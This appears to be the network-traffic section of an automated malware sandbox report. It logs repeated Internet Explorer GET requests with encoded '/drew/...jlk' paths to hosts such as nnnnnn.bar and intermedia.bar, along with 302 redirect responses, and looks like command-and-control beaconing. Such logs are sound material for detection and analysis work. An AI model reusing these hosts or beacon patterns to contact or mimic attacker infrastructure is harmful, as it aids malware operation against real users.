                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 35 66 62 45 31 57 66 67 43 4d 42 62 33 4c 62 6d 32 37 2f 46 72 51 65 48 7a 51 4d 6c 2f 64 53 48 59 33 39 30 47 61 66 4e 66 76 33 44 48 73 4f 78 4e 2f 5f 32 42 52 49 73 46 41 56 57 79 7a 32 57 75 32 5f 32 42 2f 31 36 65 4d 30 62 67 57 55 6d 57 56 30 5f 32 46 54 4b 62 43 46 47 2f 6d 36 78 4c 6b 53 67 4d 34 38 4f 7a 65 2f 4c 5a 4b 63 5f 32 42 4f 2f 4d 79 7a 70 35 7a 39 44 6b 5f 32 46 62 43 53 6e 4d 33 34 58 4a 55 67 2f 6f 67 44 39 43 6f 7a 69 37 43 2f 36 71 79 4c 57 7a 58 6e 47 41 43 74 69 44 50 34 4a 2f 4b 4f 32 57 42 50 4d 4f 43 78 58 74 2f 6f 56 68 4a 41 79 69 37 48 66 43 2f 6c 6c 53 70 36 52 35 43 62 4d 45 56 36 4f 2f 70 57 42 57 6a 76 42 6c 58 5f 32 42 7a 77 6c 49 5f 32 46 4e 65 2f 61 53 46 4e 33 52 37 4c 69 77 52 6f 61 65 6b 50 2f 39 37 73 65 33 72 78 31 65 7a 55 73 69 41 5f 32 42 2f 30 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.
                  Jan 21, 2022 07:54:21.944432020 CET12368INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:18 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 321
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 35 66 62 45 31 57 66 67 43 4d 42 62 33 4c 62 6d 32 37 2f 46 72 51 65 48 7a 51 4d 6c 2f 64 53 48 59 33 39 30 47 61 66 4e 66 76 33 44 48 73 4f 78 4e 2f 5f 32 42 52 49 73 46 41 56 57 79 7a 32 57 75 32 5f 32 42 2f 31 36 65 4d 30 62 67 57 55 6d 57 56 30 5f 32 46 54 4b 62 43 46 47 2f 6d 36 78 4c 6b 53 67 4d 34 38 4f 7a 65 2f 4c 5a 4b 63 5f 32 42 4f 2f 4d 79 7a 70 35 7a 39 44 6b 5f 32 46 62 43 53 6e 4d 33 34 58 4a 55 67 2f 6f 67 44 39 43 6f 7a 69 37 43 2f 36 71 79 4c 57 7a 58 6e 47 41 43 74 69 44 50 34 4a 2f 4b 4f 32 57 42 50 4d 4f 43 78 58 74 2f 6f 56 68 4a 41 79 69 37 48 66 43 2f 6c 6c 53 70 36 52 35 43 62 4d 45 56 36 4f 2f 70 57 42 57 6a 76 42 6c 58 5f 32 42 7a 77 6c 49 5f 32 46 4e 65 2f 61 53 46 4e 33 52 37 4c 69 77 52 6f 61 65 6b 50 2f 39 37 73 65 33 72 78 31 65 7a 55 73 69 41 5f 32 42 2f 30 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.
                  Jan 21, 2022 07:54:27.952430964 CET12379INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:18 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 321
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 35 66 62 45 31 57 66 67 43 4d 42 62 33 4c 62 6d 32 37 2f 46 72 51 65 48 7a 51 4d 6c 2f 64 53 48 59 33 39 30 47 61 66 4e 66 76 33 44 48 73 4f 78 4e 2f 5f 32 42 52 49 73 46 41 56 57 79 7a 32 57 75 32 5f 32 42 2f 31 36 65 4d 30 62 67 57 55 6d 57 56 30 5f 32 46 54 4b 62 43 46 47 2f 6d 36 78 4c 6b 53 67 4d 34 38 4f 7a 65 2f 4c 5a 4b 63 5f 32 42 4f 2f 4d 79 7a 70 35 7a 39 44 6b 5f 32 46 62 43 53 6e 4d 33 34 58 4a 55 67 2f 6f 67 44 39 43 6f 7a 69 37 43 2f 36 71 79 4c 57 7a 58 6e 47 41 43 74 69 44 50 34 4a 2f 4b 4f 32 57 42 50 4d 4f 43 78 58 74 2f 6f 56 68 4a 41 79 69 37 48 66 43 2f 6c 6c 53 70 36 52 35 43 62 4d 45 56 36 4f 2f 70 57 42 57 6a 76 42 6c 58 5f 32 42 7a 77 6c 49 5f 32 46 4e 65 2f 61 53 46 4e 33 52 37 4c 69 77 52 6f 61 65 6b 50 2f 39 37 73 65 33 72 78 31 65 7a 55 73 69 41 5f 32 42 2f 30 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  37192.168.2.349866198.54.117.21680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:20.027968884 CET12359OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  38192.168.2.349867198.54.117.21680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:20.208184958 CET12360OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  39192.168.2.349868198.54.117.21680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:20.530349016 CET12361OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.34974831.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:32.101609945 CET1137OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  40192.168.2.349869198.54.117.21680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:20.702385902 CET12361OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  41192.168.2.349870198.54.117.21680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:21.035410881 CET12362OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  42192.168.2.349871198.54.117.21680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:21.206569910 CET12363OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  43192.168.2.349872198.54.117.21680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:21.547805071 CET12365OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.bar


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  44192.168.2.349874162.255.119.17780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:21.549371004 CET12366OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:21.983202934 CET12369OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:22.516026974 CET12370OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:23.488868952 CET12372OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:25.426733017 CET12376OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:27.364140987 CET12378OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:29.301879883 CET12380OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:33.177171946 CET12381OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:40.927906036 CET12383OUTGET /drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  45192.168.2.349877162.255.119.17780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:21.575253963 CET12367OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:22.014446020 CET12370OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:22.531586885 CET12371OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:23.488856077 CET12371OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:25.379602909 CET12375OUTGET /drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
